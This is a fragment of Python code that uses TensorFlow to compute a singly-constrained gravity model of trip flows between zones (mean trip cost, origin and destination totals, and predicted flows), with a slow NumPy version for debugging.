self.tfTij = tf.placeholder(tf.float32, shape=(self.N,self.N), name='Tij') #input tensor 1 #hack! need to have the matrix dimension here!
self.tfCij = tf.placeholder(tf.float32, shape=(self.N,self.N), name='Cij') #input tensor 2
self.tfCBar = self.buildTFGraphCBar()
#create Oi graph
self.tfOi = self.buildTFGraphOi()
#create Dj graph
self.tfDj = self.buildTFGraphDj()
#create other operations here...
self.tfBeta = tf.Variable(1.0, name='beta')
self.tfRunModel = self.buildTFGraphRunModel()
###############################################################################
"""
Build TensorFlow graph to calcualate CBar
@param N order of matrix i.e. 7201
"""
def buildTFGraphCBar(self):
#TensorFlow compute graph creation here
#define tensors
#tfTij = tf.placeholder(tf.float32, shape=(N,N), name='Tij')
#tfCij = tf.placeholder(tf.float32, shape=(N,N), name='Cij')
#build graph
CNumerator = tf.reduce_sum(tf.multiply(self.tfTij,self.tfCij))
CDenominator = tf.reduce_sum(self.tfTij)
tfCBar = tf.divide(CNumerator,CDenominator,name='CBar')
#tf.math.multiply
#tf.math.exp
#this is how you would run it
#with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
# print(sess.run(tfCBar, {tfTij: Tij, tfCij: Cij}))
return tfCBar #note returning operation graph, NOT value
###############################################################################
"""
Build TensorFlow graph to calculate Oi
"""
def buildTFGraphOi(self):
tfOi = tf.reduce_sum(self.tfTij,axis=1)
return tfOi
###############################################################################
"""
Build TensorFlow graph to calculate Dj
"""
def buildTFGraphDj(self):
tfDj = tf.reduce_sum(self.tfTij,axis=0)
return tfDj
###############################################################################
#todo: Build TensorFlow graph to calculate main model equation: B*Oi*Dj*exp(beta*Cij)/sigma etc
"""
"""
def buildTFGraphRunModel(self):
#TODO: here!!!!
#[Oi 1 x n] [Dj n x 1]
#formula: Tij=Oi * Dj * exp(-beta * Cij)/(sumj Dj * exp(-beta * Cij))
tfBalance = tf.reciprocal(tf.matmul(tf.reshape(self.tfDj, shape=(1,self.N)), tf.exp(tf.negative(self.tfBeta) * self.tfCij)))
#this is the real model
tfRunModel = tf.multiply(
tfBalance,
tf.matmul(tf.reshape(self.tfOi, shape=(self.N,1)),tf.reshape(self.tfDj,shape=(1,self.N))) * tf.exp(tf.negative(self.tfBeta) * self.tfCij),
name='result'
)
#this is testing
#tfRunModel = tf.matmul(tf.reshape(self.tfOi, shape=(7201,1)),tf.reshape(self.tfDj,shape=(1,7201))) * tf.exp(tf.negative(self.tfBeta) * self.tfCij)
return tfRunModel
###############################################################################
"""
calculateCBar
Mean trips calculation
@param name="Tij" NDArray
@param name="cij" NDArray
@returns float
"""
def calculateCBar(self,Tij,Cij):
#(M, N) = np.shape(Tij)
#CNumerator = 0.0
#CDenominator = 0.0
#for i in range(0,N):
# for j in range(0,N):
# CNumerator += Tij[i, j] * cij[i, j]
# CDenominator += Tij[i, j]
#CBar = CNumerator / CDenominator
#print("CBar=",CBar)
#faster
#CNumerator2 = np.sum(Tij*Cij)
#CDenominator2 = np.sum(Tij)
#CBar2=CNumerator2/CDenominator2
#print("CBar2=",CBar2)
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
CBar = sess.run(self.tfCBar, {self.tfTij: Tij, self.tfCij: Cij})
return CBar
###############################################################################
def calculateOi(self,Tij):
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
Oi = sess.run(self.tfOi, {self.tfTij: Tij})
return Oi
###############################################################################
def calculateDj(self,Tij):
#TensorFlow
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
sess.run(tf.global_variables_initializer())
#print(sess.run(self.tfCBar, {tfTij: Tij, tfCij: Cij}))
Dj = sess.run(self.tfDj, {self.tfTij: Tij})
return Dj
###############################################################################
def runModel(self,Tij,Cij,Beta):
#TensorFlow
#run Tij = Ai * Oi * Dj * exp(-Beta * Cij) where Ai = 1/sumj Dj*exp(-Beta * Cij)
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
writer = tf.summary.FileWriter("log/TFSingleDest", sess.graph)
sess.run(tf.global_variables_initializer())
starttime = time.time()
for i in range(0,1000):
Tij = sess.run(self.tfRunModel, {self.tfTij: Tij, self.tfCij: Cij, self.tfBeta: Beta})
finishtime = time.time()
writer.close()
print("TFSingleDest: runModel ",finishtime-starttime," seconds")
return Tij
###############################################################################
def debugWriteModelGraph(self,Tij,Cij,Beta):
with tf.Session() as sess:
writer = tf.summary.FileWriter("log/TFSingleOrigin", sess.graph)
sess.run(tf.global_variables_initializer())
Tij = sess.run(self.tfRunModel, {self.tfTij: Tij, self.tfCij: Cij, self.tfBeta: Beta})
writer.close()
g = tf.get_default_graph()
print(g.get_operations())
###############################################################################
"""
Test run of equation Tij=OiDje(-BetaCij)/denom
This is a slow implementation as a test of correct functionality. This allows
breaking up of the TensorFlow code for verification.
"""
def debugRunModel(self,Oi,Dj,Tij,Cij,Beta):
(M,N) = np.shape(Tij)
TPred = np.zeros(N*N).reshape(N, N)
for i in range(0,N):
#denominator calculation which is sum of all modes
denom = 0.0 #double
for j in range(0,N):
denom += Dj[j] * exp(-Beta * Cij[i, j])
#end for j
#print("denom=",denom)
#numerator calculation
for j in range(0,N):
TPred[i, j] = Oi[i] * Dj[j] * exp(-Beta * Cij[i, j]) / denom
#print("Tijk[0,0]=",Tij[i,0])
#end for i
return TPred
###############################################################################
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.